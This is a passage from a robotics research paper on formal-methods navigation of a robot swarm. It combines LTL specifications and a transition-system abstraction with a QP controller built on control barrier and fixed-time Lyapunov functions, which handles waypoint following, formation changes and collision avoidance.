is required to reach a specific goal point in the environment while passing through a series of way-points. Secondly, the swarm should automatically change its formation according to the terrain restrictions of the environment. Thirdly, all robots in the swarm should strictly avoid collisions with other robots and obstacles. We use an LTL formula defined on multiple atomic propositions to specify the desired waypoints and formations of the swarm. Then, we formulate the transition of the waypoints and formations of the system as a DFTS and synthesize a symbolic control strategy by solving a game over the product of the DFTS and the automaton transformed from the LTL specification. Meanwhile, we use a group of CBFs and fixed-time CLFs to prescribe the runtime safety and the fixed-time convergence of the robot swarm. A QP problem is solved to generate the control inputs for individual robots by refining the symbolic control strategy. The refinement of the controller ensures the satisfaction of the predefined LTL specifications. 
Our main contribution is the proposed framework itself, which uses formal methods and symbolic control strategies to solve practical, complicated multi-robot tasks; in particular, we realize the correspondence between the abstract transition model and the concrete multi-robot swarm system and show how it helps achieve the objectives of the swarm navigation task. The framework and its realization can be extended to other types of complex multi-robot coordinated tasks. The rest of the paper is organized as follows. Sec. II introduces the preliminary knowledge of this paper. Sec. III presents the framework of using formal control methods to solve complex tasks for multi-robot swarm systems and formally formulates the problem of this paper. In Sec. IV, we propose the solutions to this problem, namely the synthesis of the symbolic control strategy and the design of the robot controller by solving a QP problem. In Sec. V, we validate our framework and solutions with a simulation case on robot swarm navigation. Finally, Sec. VI concludes the paper. _Notation:_ We use \(\mathbb{R}\), \(\mathbb{R}^{+}\), and \(\mathbb{R}_{\geq 0}\) to represent the sets of real, positive real, and non-negative real numbers. We also use \(\mathbb{N}^{+}\) and \(\mathbb{N}_{\geq 0}\) to denote the sets of positive and non-negative integers. For a finite set \(\Xi\), we use \(|\Xi|\) to denote the total number of its elements. ## II Preliminaries In this section, we introduce the preliminary knowledge of this paper, including DFTS and LTL for the synthesis of a symbolic control strategy, and CBFs and fixed-time CLFs for the design of robot controllers. ### _Linear Temporal Logic (LTL)_ LTL is a formal language used to prescribe specifications. Consider a set of atomic propositions \(\mathsf{AP}=\{p_{1},\ldots,p_{N}\}\) which defines an alphabet \(2^{\mathsf{AP}}\), where each letter \(\pi\in 2^{\mathsf{AP}}\) contains the set of atomic propositions that are true. An infinite string of letters is a word \(\boldsymbol{\omega}=\omega_{0}\omega_{1}\omega_{2}\ldots\), where \(\omega_{i}\in 2^{\mathsf{AP}}\), \(i\in\mathbb{N}_{\geq 0}\), with a suffix \(\boldsymbol{\omega}_{k}=\omega_{k}\omega_{k+1}\omega_{k+2}\ldots\), \(k\in\mathbb{N}_{\geq 0}\). The syntax of LTL formulas is recursively defined as follows, \[\psi::=\top\mid p\mid\neg\psi\mid\psi_{1}\wedge\psi_{2}\mid\bigcirc\!\psi\mid \psi_{1}\mathcal{U}\psi_{2}, \tag{1}\] where \(\psi_{1}\), \(\psi_{2}\) and \(\psi\) are LTL formulas, \(p\in\mathsf{AP}\) is an atomic proposition, \(\neg\) is the negation operator, \(\wedge\) is the conjunction operator that connects two LTL formulas, and \(\bigcirc\) and \(\mathcal{U}\) represent the _next_ and _until_ temporal operators, respectively. Based on these essential operators, other logical and temporal operators, namely _disjunction_ \(\vee\), _implication_ \(\rightarrow\), _eventually_ \(\lozenge\), and _always_ \(\square\), can be defined as \(\psi_{1}\vee\psi_{2}:=\neg(\neg\psi_{1}\wedge\neg\psi_{2})\), \(\psi_{1}\rightarrow\psi_{2}:=\neg\psi_{1}\vee\psi_{2}\), \(\lozenge\psi:=\top\,\mathcal{U}\,\psi\), and \(\square\psi:=\neg\lozenge\neg\psi\). 
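As a small illustration of these connectives, the sketch below evaluates formulas built from the core operators on a finite word (a list of sets of atomic propositions), using finite-trace semantics as a stand-in for the infinite-word semantics listed next; the tuple encoding of formulas is our own convention.

```python
# Hedged sketch: checking an LTL formula on a finite word, where a formula is
# a nested tuple, e.g. ("until", ("ap", "p1"), ("ap", "p2")).
def holds(phi, word, t=0):
    op = phi[0]
    if op == "ap":
        return phi[1] in word[t]
    if op == "not":
        return not holds(phi[1], word, t)
    if op == "and":
        return holds(phi[1], word, t) and holds(phi[2], word, t)
    if op == "next":                      # truncated semantics at the last step
        return t + 1 < len(word) and holds(phi[1], word, t + 1)
    if op == "until":                     # psi1 U psi2 on the finite suffix
        return any(holds(phi[2], word, i) and
                   all(holds(phi[1], word, j) for j in range(t, i))
                   for i in range(t, len(word)))
    raise ValueError(f"unknown operator {op}")

# "eventually p" is (True U p); here we check "w1 U goal" on a short word.
word = [{"w1"}, {"w1"}, {"w2", "goal"}]
print(holds(("until", ("ap", "w1"), ("ap", "goal")), word))   # True
```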
For a given word \(\boldsymbol{\omega}\), the semantics of LTL are given as * \(\boldsymbol{\omega}_{t}\models p\), if \(p\in\omega_{t}\); \(\boldsymbol{\omega}_{t}\models\neg p\), if \(p\notin\boldsymbol{\omega}_{t}\); * \(\boldsymbol{\omega}_{t}\models\psi_{1}\wedge\psi_{2}\), if \(\boldsymbol{\omega}_{t}\models\psi_{1}\) and \(\boldsymbol{\omega}_{t}\models\psi_{2}\); * \(\boldsymbol{\omega}_{t}\models\bigcirc\!\psi\), if \(\boldsymbol{\omega}_{t+1}\models\psi\); * \(\boldsymbol{\omega}_{t}\models\psi_{1}\mathcal{U}\psi_{2}\), if \(\exists\ i\in\mathbb{N}\) such that \(\boldsymbol{\omega}_{t+i}\models\psi_{2}\), and \(\boldsymbol{\omega}_{t+j}\models\psi_{1}\) holds \(\forall\,0\leq j<i\). ### _Deterministic Finite Transition System (DFTS)_ Now, we give the definition of a DFTS which is used to describe the abstract model of a continuous-state system. **Definition 1**: _(Deterministic Finite Transition System, DFTS): A deterministic finite transition system is a tuple \(\mathcal{T}=(S,A,\delta,\,\mathsf{AP},\,\mathcal{L})\), where \(S\) and \(A\) are finite sets of states and actions, \(\delta:S\!\times\!A\to S\) is a transition function that prescribes the state transition under a certain input, \(\mathsf{AP}\) is a finite set of atomic propositions, and \(\mathcal{L}\!:S\!\rightarrow\!2^{\mathsf{AP}}\) is a labeling function. \(\square\)_ Given a sequence of actions \(\mathbf{a}=a_{0}a_{1}a_{2}\cdots\) with \(a_{i}\in A\), a DFTS \(\mathcal{T}\) initiated at \(s_{0}\in S\) generates a trajectory or a run \(s_{0}s_{1}s_{2},\ldots\), where \(s_{i+1}=\delta(s_{i},a_{i})\), \(i\in\mathbb{N}_{\geq 0}\). Then, the output word of the DFTS \(\boldsymbol{\omega}=\omega_{0}\omega_{1}\omega_{2}\cdots\) is uniquely defined for a given initial state \(s_{0}\in S\), where \(\omega_{i}\in 2^{\mathsf{AP}}\), \(i\in\mathbb{N}_{\geq 0}\). For a DFTS \(\mathcal{T}\), its control strategy is defined as follows. **Definition 2** (Control Strategy): _A control strategy for a DFTS \(\mathcal{T}=(S,A,\delta,\mathsf{AP},\mathcal{L})\) is given by \((\Omega,S_{0})\), where \(\Omega:S^{+}\to A\) is a (history-dependent) control function defined on a finite, nonempty sequence of states \(S^{+}\) of \(\mathcal{T}\), and \(S_{0}\subseteq S\) is a set of initial states of \(\mathcal{T}\). \(\square\)_ ### _Fixed-Time Control Lyapunov Function (FxT CLF)_ Stability is a property that guarantees the system is driven to an equilibrium (or a set of equilibria). In contrast to asymptotic stability (AS) which pertains to convergence as time goes to infinity, finite-time stability is a concept that guarantees the convergence of solutions in finite time. Fixed-time stability (FxTS) is an even stronger notion than finite-time stability, where the time of convergence does not depend upon the initial conditions. Consider the control affine system as follows, \[\dot{x}(t)=f(x(t))+g(x(t))u(t), \tag{2}\] where \(x(t)\in\mathbb{X}\subset\mathbb{R}^{n}\) and \(u(t)\in\mathbb{U}\subset\mathbb{R}^{m}\) are, respectively, the low-level physical state and input of the system at time \(t\in\mathbb{R}_{\geq 0}\), \(f:\mathbb{R}^{n}\rightarrow\mathbb{R}^{n}\) is a smooth vector field, and \(g:\mathbb{R}^{n}\rightarrow\mathbb{R}^{n\times m}\) is the smooth gain matrix. Then, the convergence of the system trajectories to a compact set within a fixed time can be encoded using a class of fixed-time (FxT) CLFs [21]. 
**Definition 3**: _(Fixed-Time Control Lyapunov Function, FxT CLF): For a control affine system defined as (2), a continuously differentiable function \(V:\mathbb{R}^{n}\rightarrow\mathbb{R}\) is referred to as a fixed-time (FxT) CLF if \(V(x)\) is positive definite w.r.t \(\mathcal{X}\in\mathbb{X}\) and the following condition holds for all \(x\in\mathbb{X}\backslash\mathcal{X}\),_ \[\inf_{u\in\mathcal{U}}\left\{L_{f}V(x)+L_{g}V(x)u\right\}\leq-\alpha_{1}V(x)^ {\gamma_{1}}-\alpha_{2}V(x)^{\gamma_{2}}, \tag{3}\] _where \(\alpha_{1},\alpha_{2}\!>\!0\), \(\gamma_{1}\!=\!1\!+\!\frac{1}{\mu}\), \(\gamma_{2}\!=\!1\!-\!\frac{1}{\mu}\), \(\mu\!>\!1\). All control inputs \(u(t)\) that render an FxT-CLF ensure that the system state converges to \(x\in\mathcal{X}\) within a finite time \(T\) from any initial state \(x_{0}\!\in\!\mathbb{X}\), where \(T\!\leq\!\frac{\mu\pi}{2\sqrt{\alpha_{1}\alpha_{2}}}\!\leq\!T_{ud}\), \(T_{ud}\!\in\!\mathbb{R}^{+}\). \(\square\)_ ### _Control Barrier Function (CBF)_ The principle of safety demands the avoidance of dangerous occurrences, both in the present and future time. It is common to define the forward invariance of safe sets as safety. **Definition 4** (Forward Invariance): _A set \(\mathcal{C}\subset\mathbb{X}\) is forward invariant if \(\forall\,x_{0}\in\mathcal{C}\), \(x(t)\in\mathcal{C}\) for \(x(0)=x_{0}\) and all \(t>0\). The system \(\dot{x}=f(x)\) is safe with respect to the set \(\mathcal{C}\) if the set \(\mathcal{C}\) is forward invariant. \(\square\)_ In this work, we use the following notion of zeroing Control Barrier Functions (CBFs), introduced in [16], to ensure forward invariance of the safe set \(\mathcal{C}\). **Definition 5** ((Zeroing) Control Barrier Function, CBF): _Let \(\mathcal{C}\!\subset\!D\!\subset\!\mathbb{R}^{n}\) be the super-level set of \(a\) continuously differentiable function \(h:D\rightarrow\mathbb{R}\). Then \(h\) is a (zero) control barrier function if there exists an extended class \(\mathcal{K}_{\infty}\) function \(\alpha\) such that for the control affine system (2),_ \[\sup_{u\in U}\left[L_{f}h(x)+L_{g}h(x)u\right]\geq-\alpha(h(x)),\ \forall\,x\in D, \tag{4}\] _where extended class \(\mathcal{K}_{\infty}\) function is a strictly increasing function \(\alpha:\mathbb{R}\rightarrow\mathbb{R}\) with \(\alpha(0)=0\)._ _Furthermore, the condition of control inputs for the given CBF \(h\) is derived to ensure forward invariance,_ \[K_{\mathrm{cbf}}(x)=\left\{u\in U|L_{f}h(x)+L_{g}h(x)u+\alpha(h(x))\geq 0 \right\}. \tag{5}\] ## III Framework and Problem Statement In this section, we present the framework for using formal control methods to solve the automated navigation controller for a robot swarm, which is one of our main contributions. We specifically highlight the definitions of the robot swarm system, the abstract model of the system based on a DFTS, and how they are connected. Then, we formulate the problem to be solved in this paper formally. 
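Before the swarm model is introduced, it is worth noting how Definitions 3 and 5 are typically combined in practice: at each state one solves a small quadratic program of the kind used later when refining the symbolic strategy, staying close to a nominal input while respecting the FxT-CLF decrease condition (3) (relaxed by a slack) and the CBF condition defining \(K_{\mathrm{cbf}}(x)\) in (5). The sketch below does this for a single-integrator robot with cvxpy; the choice \(\alpha(h)=\kappa h\), the slack penalty, and the example numbers are our assumptions, not values from the paper.

```python
import numpy as np
import cvxpy as cp

def clf_cbf_qp(u_ref, V, LfV, LgV, h, Lfh, Lgh,
               alpha1=1.0, alpha2=1.0, mu=2.0, kappa=1.0, slack_pen=100.0):
    """Pointwise QP: track u_ref subject to the FxT-CLF row (Eq. 3, with a
    slack d for feasibility) and the CBF row (Eqs. 4-5 with alpha(h)=kappa*h)."""
    u = cp.Variable(u_ref.shape[0])
    d = cp.Variable(nonneg=True)
    g1, g2 = 1 + 1 / mu, 1 - 1 / mu
    constraints = [
        LfV + LgV @ u <= -alpha1 * V ** g1 - alpha2 * V ** g2 + d,  # Eq. (3)
        Lfh + Lgh @ u >= -kappa * h,                                 # Eqs. (4)-(5)
    ]
    cp.Problem(cp.Minimize(cp.sum_squares(u - u_ref) + slack_pen * d),
               constraints).solve()
    return u.value

# Single integrator x_dot = u: converge toward a goal while keeping h(x) >= 0,
# with V(x) = ||x - x_goal||^2 and h(x) = ||x - x_obs||^2 - r^2.
x, x_goal, x_obs, r = np.array([2.0, 1.0]), np.zeros(2), np.array([1.0, 0.5]), 0.4
V, LfV, LgV = float((x - x_goal) @ (x - x_goal)), 0.0, 2 * (x - x_goal)
h, Lfh, Lgh = float((x - x_obs) @ (x - x_obs) - r ** 2), 0.0, 2 * (x - x_obs)
print(clf_cbf_qp(u_ref=-(x - x_goal), V=V, LfV=LfV, LgV=LgV, h=h, Lfh=Lfh, Lgh=Lgh))
```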
### _Modeling Waypoints and Formation for a Robot Swarm_ Consider a multi-robot swarm system with \(N\in\mathbb{N}^{+}\) robots, where each robot has the following dynamic model, \[\mathcal{R}_{i}:\dot{x}_{i}(t)=f(x_{i}(t),u_{i}(t)),\quad i=1,\ldots,N, \tag{6}\] where \(x_{i}(t)\in\mathbb{X}\subset\mathbb{R}^{n},u_{i}(t)\in\mathbb{U}\subset \mathbb{R}^{m}\) are the state and the control input of the \(i\)-th robot at time \(t\in\mathbb{R}_{\geq 0}\), respectively, and \(f:\mathbb{R}^{n}\times\mathbb{R}^{m}\rightarrow\mathbb{R}^{n}\) is a smooth function that describes the dynamic model of the robot. For brevity, we use vectors \(x(t)=[\,x_{1}^{T}(t),\cdots,x_{N}^{T}(t)\,]^{T}\) and \(u(t)=[\,u_{1}^{T}(t),\cdots,u_{N}^{T}(t)\,]^{T}\) to denote the state and control input of all robots in the system. The interaction between the robots is described by an undirected graph \(\mathcal{G}=\{\mathcal{V},\mathcal{E}\}\), where \(\mathcal{V}=\{1,2,\cdots,N\}\) denotes the set of the robots and \(\mathcal{E}\subseteq\mathcal{V}\times\mathcal{V}\) is the set of edges of robot interactions, where \((i,j)\in\mathcal{E}\) if robots \(i\) and \(j\) are connected, \(i\neq j\). We define \(x_{c}=\frac{1}{N}\sum_{i=1}^{N}x_{i}\) as the geometric center or _centroid_ of the swarm. Also, if \((i,j)\in\mathcal{E}\), we define \(x_{ij}=x_{i}-x_{j}\) and \(u_{ij}=u_{i}-u_{j}\) as the relative displacement and control input difference between two robots \(i,j\in\mathcal{V}\), \(i\neq j\). The waypoints of the robot swarm are specified by a finite set \(W=\{w^{1},w^{2},\cdots,w^{N_{W}}\}\), where \(w^{k}\in\mathbb{R}^{n}\), \(k=1,2,\cdots,N_{W}\), and \(N_{W}\in\mathbb{N}^{+}\). For each waypoint \(w\in W\), we define a set \(\mathcal{W}(w)=\{x\in\mathbb{R}^{n}\,|\,h_{\mathcal{W}}(x,w)\leq 0\}\) to represent a circular region around \(w\), where \(h_{\mathcal{W}}(x,w)=\|x-w\|^{2}-d_{G}^{2}\) and \(d_{G}\in\mathbb{R}^{+}\) is a tolerance threshold. The swarm centroid \(x_{c}\) is required to follow a given waypoint \(w\) within the tolerance threshold, i.e., \(x_{c}\in\mathcal{W}(w)\). The formations of the robot swarm are specified by a finite set \(F=\{F^{1},F^{2},\cdots,F^{N_{F}}\}\), where each \(F^{k}=\{f_{ij}^{k}\}_{(i,j)\in\mathcal{E}}\), \(k=1,2,\cdots,N_{F}\), is a finite set whose elements \(f_{ij}^{k}\in\mathbb{R}^{n}\), \((i,j)\in\mathcal{E}\), prescribe the desired displacement between two robots to achieve a certain formation, and \(N_{F}\in\mathbb{N}^{+}\). For any \(F^{\prime}\in F\), we define a set \(\mathcal{F}(f_{ij})=\{x\in\mathbb{R}^{n}\,|\,h_{\mathcal{F}}(x,f_{ij})\leq 0\}\), where \(f_{ij}\in F^{\prime}\), \((i,j)\in\mathcal{E}\), and \(h_{\mathcal{F}}(x,f_{ij})=\|x-f_{ij}\|^{2}-d_{F}^{2}\), with \(d_{F}\in\mathbb{R}^{+}\) a tolerance threshold. The swarm needs to track the formation \(F^{\prime}\) within the tolerance threshold, i.e., \(x_{ij}\in\mathcal{F}(f_{ij})\), for all \(f_{ij}\in F^{\prime}\), \((i,j)\in\mathcal{E}\). The robot swarm should also satisfy the runtime safety requirements, i.e., collision avoidance with other robots and obstacles. We use \(d_{O}\in\mathbb{R}^{+}\) to represent the minimal distance between two interacting robots. Based on this, we define a safety set \(\mathcal{D}=\{x\,|\,h_{\mathcal{D}}(x)\geq 0\}\), where \(h_{\mathcal{D}}(x)=\|x\|^{2}-d_{O}^{2}\). Collision avoidance with other robots requires that \(x_{ij}\in\mathcal{D}\) for all \((i,j)\in\mathcal{E}\).
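The waypoint, formation, and inter-robot safety sets just defined are simple set-membership tests; a hedged sketch with illustrative numbers is given below (the obstacle set \(\mathcal{O}\) introduced next is analogous and omitted here).

```
import numpy as np

# Hedged sketch of the membership tests defined above; all numbers are illustrative.

def centroid(X):
    """Geometric center x_c of the swarm; X has one robot state per row."""
    return X.mean(axis=0)

def h_waypoint(x_c, w, d_G):
    """h_W(x_c, w) <= 0 means the centroid is within d_G of waypoint w."""
    return np.sum((x_c - w) ** 2) - d_G ** 2

def h_formation(x_ij, f_ij, d_F):
    """h_F(x_ij, f_ij) <= 0 means the pairwise displacement matches the formation."""
    return np.sum((x_ij - f_ij) ** 2) - d_F ** 2

def h_collision(x_ij, d_O):
    """h_D(x_ij) >= 0 means robots i and j keep at least distance d_O apart."""
    return np.sum(x_ij ** 2) - d_O ** 2

X = np.array([[0.0, 0.0], [1.0, 0.0], [0.5, 1.0]])   # three planar robots
x_c = centroid(X)
print(h_waypoint(x_c, w=np.array([0.5, 0.3]), d_G=0.2) <= 0)               # centroid near waypoint?
print(h_formation(X[0] - X[1], f_ij=np.array([-1.0, 0.0]), d_F=0.1) <= 0)  # pair (1,2) in formation?
print(h_collision(X[0] - X[1], d_O=0.3) >= 0)                              # pair (1,2) collision-free?
```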
Also, we use the set \(\mathcal{O}\!=\!\{x\in\mathbb{R}^{n}|h_{\mathcal{O}}(x)\!\geq\!0\}\) to represent the maximal ellipsoid collision-free region for the robot swarm, where \(h_{\mathcal{O}}(x)\!=\!1\!-\!(x\!-\!\eta)^{T}\!P(x\!-\!\eta)\), where \(\eta\!\in\!\mathbb{R}^{n}\) and \(P\!\in\mathbb{R}^{n\times n}\) are constant parameters determined by the environment. Collision avoidance with obstacles requires \(x_{c}\in\mathcal{O}\). ### _Abstraction of Waypoint and Formation Dynamics_ We use a DFTS \(\mathcal{T}=\{S,A,\delta,\mathsf{AP},\mathcal{L}\}\) introduced in Definition 1 to represent the transition of the waypoints and formations of the robot swarm system, where \(S=\tilde{W}\times\tilde{F}\) is the finite state space of \(\mathcal{T}\), where \(\tilde{W}\) and \(\tilde{F}\) are finite symbolic sets that abstract the waypoint set \(W\) and the formation set \(F\), respectively, where \(|\tilde{W}|=|W|\), \(|\tilde{F}|=|F|\), \(A\) is a finite set of actions of \(\mathcal{T}\), \(\delta:A\times\tilde{W}\times\tilde{F}\rightarrow\tilde{W}\times\tilde{F}\) prescribes the transition of the waypoints and the formations, \(\mathsf{AP}=\mathsf{AP}_{f}\times\mathsf{AP}_{w}\) is a complex atomic proposition set, where \(\mathsf{AP}_{f}\) and \(\mathsf{AP}_{w}\) are finite sets of atomic propositions related to the abstract waypoint set \(\tilde{W}\) and the abstract formation set \(\tilde{F}\), respectively, and \(\mathcal{L}=\{\mathcal{L}_{w},\mathcal{L}_{f}\}\), where \(\mathcal{L}_{w}:\tilde{W}\rightarrow\mathsf{2^{AP}}_{w}\) and \(\mathcal{L}_{f}:\tilde{F}\rightarrow\mathsf{2^{AP}}_{f}\) are labeling mappings. For any sequence of actions \(\mathbf{a}=a_{0}a_{1}a_{2}\cdots\), where \(a_{i}\in A\), \(i\in\mathbb{N}_{\geq 0}\), \(\mathcal{T}\) generates two state trajectories \(\mathbf{w}=w_{0}w_{1}w_{2}\cdots\) and \(\mathbf{f}=f_{0}f_{1}f_{2}\cdots\), where \(w_{i}\in W\), \(f_{i}\in F\), \(i\in\mathbb{N}_{\geq 0}\). Based on the labeling mappings \(\mathcal{L}_{w}\) and \(\mathcal{L}_{f}\), the changes of the waypoints and formations can now be translated to a complex word \(\boldsymbol{\omega}=(\omega_{0}^{w},\omega_{0}^{f})(\omega_{1}^{w},\omega_{1}^ {f})(\omega_{w}^{w},\omega_{2}^{f})\cdots\) on which we assign a LTL formula \(\psi\) that specifies the swarm navigation task, where \(\omega_{i}^{w}\in\mathsf{2^{AP}}_{w}\), \(\omega_{f}^{f}\in\mathsf{2^{AP}}_{f}\), \(i,j\in\mathbb{N}_{\geq 0}\). Then, we say that the waypoints and formations of the robot swarm satisfy the navigation task specification if \(\boldsymbol{\omega}\models\psi\). ### _Problem Statement_ Let a multi-robot swarm system (6) be given together with an LTL formula \(\psi\) that specifies the waypoints and formations of the swarm during the navigation task. The main objective of the swarm navigation control problem is to design a controller for each robot in the swarm, such that the swarm centroid reaches the waypoints with the corresponding formations as specified by \(\psi\), which is formally formulated as follows. **Problem 1** (Swarm Navigation with Automated Formation): _Given a system \(\mathcal{R}=\{\mathcal{R}_{1},\mathcal{R}_{2},\cdots,\mathcal{R}_{N}\}\) defined on a closed domain \(\mathbb{X}\subset\mathbb{R}^{n}\) as in (6), a DFTS \(\mathcal{T}\) defined as in Sec. III-B, and an LTL formula \(\psi\) defined on the paired word \(\boldsymbol{\omega}\) as defined in Sec. III-B, solve the following sub-problems._ 1. 
_Synthesize a symbolic control strategy_ \((\Omega,S_{0})\)_, such that for any feasible initial state_ \(s_{0}\in S_{0}\)_,_ \(\boldsymbol{\omega}\models\psi\)_, where_ \(S_{0}\) _is the largest satisfaction region of_ \(\mathcal{T}\times\psi\)___[_23_]__._ 2. _For each_ \(i\in\mathcal{V}\)_, design a controller_ \(u_{i}:S\rightarrow\mathbb{R}^{m}\)_, such that the following conditions hold within a fixed time, for any initial conditions_ \(x_{i}(0)\in\mathbb{X}\)_._ * _For any given waypoint_ \(w\!\in\!W\) _and formation_ \(F^{\prime}\!\in\!F\)_, achieve_ \(x_{c}\!\in\!\mathcal{W}(w)\) _and_ \(x_{ij}\!\in\!\mathcal{F}(f_{ij})\) _for all_ \(f_{ij}\in F^{\prime}\)_,_ \((i,j)\!\in\!\mathcal{E}\)_._ * _For any environmental perception_ \(\eta,P\)_, achieve_ \(x_{c}\in\mathcal{O}\) _and_ \(x_{ij}\in\mathcal{D}\)_, for all_ \((i,j)\in\mathcal{E}\)_._ The two sub-problems of Problem 1 prescribe the requirements for task specifications and runtime safety, respectively. The solution to this problem is given in the next section. ## IV Synthesis of Swarm Controller In this section, we present the solution to the framework and problem proposed in Sec. III. We first introduce the synthesis of a symbolic control strategy for a DFTS and an LTL specification, as prescribed by Problem 1-1). Then, we use QP to solve the robot controllers for Problem 1-2). ### _Symbolic Controller Synthesis_ This subsection discusses the synthesis of the symbolic control strategy for the swarm controller. To achieve this, we need to determine the waypoints and formations and realize the abstract model of the swarm system as a DFTS. The synthesis process is performed in three steps #### Iv-A1 Step 1: Determine the Waypoints and Formations The first step is to determine the waypoints and formations for the swarm navigation task, for which we need to make a relation between the swarm dynamic system (6) and the DFTS \(\mathcal{T}\) defined in Sec. III-B. For a certain swarm navigation problem on a closed region \(\mathbb{X}\subset\mathbb{R}^{n}\), the waypoint set \(W\) and the formation set \(F\) should be determined according to the specific terrain conditions of the region. A straightforward manner is to split the navigation region into \(N_{W}\) grid units and assign the geometric center or centroid of each unit as a waypoint. Then, for each waypoint, the feasible formations that can fit the terrain restrictions are determined. #### Iv-A2 Step 2: realization of the DFTS After determining the sets of waypoints and formations \(W\) and \(F\), the next step is to use a DFTS \(\mathcal{T}=\{S,A,\delta,\mathsf{AP},\mathcal{L}\}\) to realize an abstract model for the swarm system. As addressed in Sec. III-B, the state space is determined as \(S=\tilde{W}\times\tilde{F}\), where \(\tilde{W}\) and \(\tilde{F}\) are finite symbolic sets that have the same amounts of elements with \(W\) and \(F\), respectively. The action set \(A\) is also a finite symbolic set that prescribes all possible actions for certain states which are determined by the adjacency relation among different waypoints and formations, i.e., which waypoints and formations can be reached after the current ones. For a certain waypoint \(\tilde{w}\in\tilde{W}\) and \(\tilde{f}\in\tilde{F}\), the transition \(\delta\) prescribes the next feasible waypoint and formation under a certain action \(a\in A\). There are several principles to realize the action set \(A\) and the transition \(\delta\). 
Firstly, the adjacency relation among the waypoints and formations provides the largest sets of possible actions and transitions. Secondly, infeasible actions and transitions subject to environmental restrictions should be eliminated. For example, a transition is not realizable if the current waypoint does not guarantee sufficient space to tolerate the transient stage for the next formulation. We do not promise a universal and general approach to realizing a DFTS for swarm control. Instead, the realization pretty much depends on specific scenarios. #### Iv-A3 Step 3: Synthesis of A Control Strategy Given an LTL specification \(\psi\) and a realized DFTS \(\mathcal{T}\), a symbolic control strategy is synthesized using a model-checking-based approach that solves a game over the product automaton \(\mathcal{T}\times\psi\)[24].The resulting control strategy takes the form of a feedback control automaton, which reads the current waypoint and formation and generates an action to be applied to the transition of the DFTS. There exist off-the-shelf toolboxes that can synthesize a control strategy for LTL specifications [25, 26]. The overall synthesis procedure can be referred to [27, 23]. ### _Solving Robot Control Using Quadratic Programming_ Problem 1-2) prescribes that the states of the multi-robot swarm system should fall into the predefined sets, which can be encoded using CBFs defined in (3). Then, the robot controllers can be computed by solving a QP problem. We first give the formulation of the QP problem. Then, we provide a qualitative analysis of two important properties of the closed-loop dynamics of the swarm system, namely, convergence and safety. They are used to verify the satisfaction of the task specification and the runtime safety requirements, respectively. #### Iv-B1 Computing Robot Control Inputs Via Solving QP The solution to Problem 1-2) is given by the following QP problem in (7), for all \(i,j=1,2,\cdots,N\), \((i,j)\in\mathcal{E}\), \[\min_{z}z^{\mathrm{T}}Hz+Q^{\mathrm{T}}z\] (7a) s.t. \[\|u_{i}\|\leq u_{\mathrm{max}}, \tag{7b}\] \[\frac{\partial h_{\mathcal{W}}(x_{c},w)}{\partial x_{c}}u_{c}\! \leq\!\delta_{1}h_{\mathcal{W}}(x_{c},w) -\alpha_{1}\mathrm{max}^{\gamma_{1}}\{0,h_{\mathcal{W}}(x_{c},w)\}\] \[-\alpha_{2}\mathrm{max}^{\gamma_{2}}\{0,h_{\mathcal{W}}(x_{c},w)\},\] (7c) \[\frac{\partial h_{\mathcal{F}}(x_{ij},f_{ij})}{\partial x_{ij}}u_ {ij}\!\leq\!\delta_{1}h_{\mathcal{F}}(x_{ij},f_{ij})\] \[-\alpha_{1}\mathrm{max}^{\gamma_{1}}\{0,h_{\mathcal{F}}(x_{ij},f _{ij})\}-\alpha_{2}\mathrm{max}^{\gamma_{2}}\{0,h_{\mathcal{F}}(x_{ij},f_{ij} )\},\] (7d) \[\frac{\partial h_{\mathcal{D}}(x_{ij})}{\partial x_{ij}}u_{ij} \geq-\delta_{2}h_{\mathcal{D}}(x_{ij}),\] (7e) \[\frac{\partial h_{\mathcal{O}}(x_{i})}{\partial x_{i}}u_{i}\geq- \delta_{2}h_{\mathcal{O}}(x_{i}), \tag{7f}\] where \(z=[u^{T},\delta^{T}]^{T}\in\mathbb{R}^{2\times N+2}\) are decision variables, where \(\delta=[\,\delta_{1},\,\delta_{2}\,]\in\mathbb{R}^{2}\) are two slack variables, \(H\) is a diagonal matrix with positive constant elements, \(Q=[\,\mathbf{0}_{2\times N},w_{\delta_{1}},0\,]\) where \(w_{\delta_{1}}\in\mathbb{R}^{+}\) is a penalizing scalar of the slack variable \(\delta_{1}\), and \(u_{\mathrm{max}}\in\mathbb{R}^{+}\) defines the control limit of the system. The main purpose of involving the slack variables is to relax the constraints and improve the feasibility of the QP problem. 
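To make the structure of (7) more tangible, here is a schematic, deliberately simplified sketch for a single robot with single-integrator dynamics, keeping only the input bound (7b) and a (7c)-style fixed-time reach constraint, and using SciPy's generic SLSQP solver as a stand-in (the paper's implementation uses CasADi with the ipopt solver, see Sec. V). All gains here are placeholders; the parameter choices actually used are discussed next.

```
import numpy as np
from scipy.optimize import minimize

# Schematic, single-robot version of a QP in the spirit of (7): one FxT reach
# constraint and the input bound.  Placeholders only.

mu, T_ud, u_max, w_d1 = 2.0, 4.0, 5.0, 100.0
a1 = a2 = mu * np.pi / (2.0 * T_ud)
g1, g2 = 1.0 + 1.0 / mu, 1.0 - 1.0 / mu

x, w, d_G = np.array([2.0, 1.0]), np.array([0.0, 0.0]), 0.1   # state, waypoint, tolerance
h = np.sum((x - w) ** 2) - d_G ** 2                           # h_W(x, w)
dh = 2.0 * (x - w)                                            # its gradient

def cost(z):                    # z = [u_1, u_2, delta_1]
    u, d1 = z[:2], z[2]
    return float(u @ u) + w_d1 * d1 ** 2

cons = [
    # (7c)-style FxT constraint, written as fun(z) >= 0 for SLSQP:
    {"type": "ineq", "fun": lambda z: z[2] * h
        - a1 * max(0.0, h) ** g1 - a2 * max(0.0, h) ** g2 - dh @ z[:2]},
    # (7b): ||u|| <= u_max, in smooth squared form
    {"type": "ineq", "fun": lambda z: u_max ** 2 - z[:2] @ z[:2]},
]
bounds = [(None, None), (None, None), (0.0, None)]            # slack delta_1 >= 0

res = minimize(cost, x0=np.zeros(3), method="SLSQP", constraints=cons, bounds=bounds)
print(res.x[:2])   # control input steering the robot toward the waypoint
```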
